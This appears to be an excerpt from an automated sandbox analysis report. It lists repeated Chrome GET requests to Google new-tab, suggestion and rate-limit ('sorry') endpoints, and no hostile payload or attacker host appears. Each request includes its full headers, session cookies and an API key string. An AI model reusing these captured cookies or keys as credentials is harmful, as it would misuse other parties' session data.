Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGK7dzrEGIjAgKvCcnwg6hTnJngfc9eaYgHGDI79MptO06svH8vUkRmA0qhByG2uNJZTJErrbtzMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGK7dzrEGIjB-lB3Hfh_-grAroUfQ4ulZayQnQ3jYD8g4ouSleSBRPOPVtIe6ARSkXUqQqBbXlGMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGK7dzrEGIjDq-mFFkbgFVaqY36H785yGShiPXuv9YMW_Y12o7PZkmsAwZQOjvC-0xZLraM2rZywyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGNXdzrEGIjDeVoNnGK_GApW0nItKIOjxmbXH37fH625ketxhzwrf8wZW5xn9h04112noRcT8ufgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGNXdzrEGIjD1MJOBAZ8nZtfVYeKIBfX03XxbdgYCqeCJ1ArvmL45jK3mHxtysW1beDmZztvCZw0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGNXdzrEGIjDejCwGBRq5bOS0gkdA5jfdC41J9qggBKwhElfSvW43xvZ1ww5gHJgEm6bLkJDKqCcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGOzdzrEGIjCfBvE4KZSZqQDo_mkN-yIUb4l04OpYUnN-_hx9hfvdk99ntwcCm2FPKZvYcHn8Q8IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGOzdzrEGIjCKF70bFjbPy54pl9_7pZMp1HqF5_Gw5IhtTtRMmmIqlnyFWm5JdONgkFudsvQHPE4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGOzdzrEGIjD4BYm6o4hKCYiqPjxXvkfZ2ovXRpRUm6SnG4gMqKAQ4dBvO8srgL5uNXO3jWFzVVcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPrdzrEGIjBSZezThE0VlB5syruPfQ0MF7f9-btF8DEU_uZA1mJxV0vvucs3pOniQyrvmvmqITgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGPrdzrEGIjD62BF9VLil3q7TBHlgAoNwZbQ57mjRTqpirCuZCcht2cAGpDc-noXcoTbNMkmgGOcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPrdzrEGIjCtrS8FO6VuBYPPDk2ZfANTVMaWuzc8Qym8n-wLGy1fgH1qjNPYT2IHwPh3tA3EXpIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
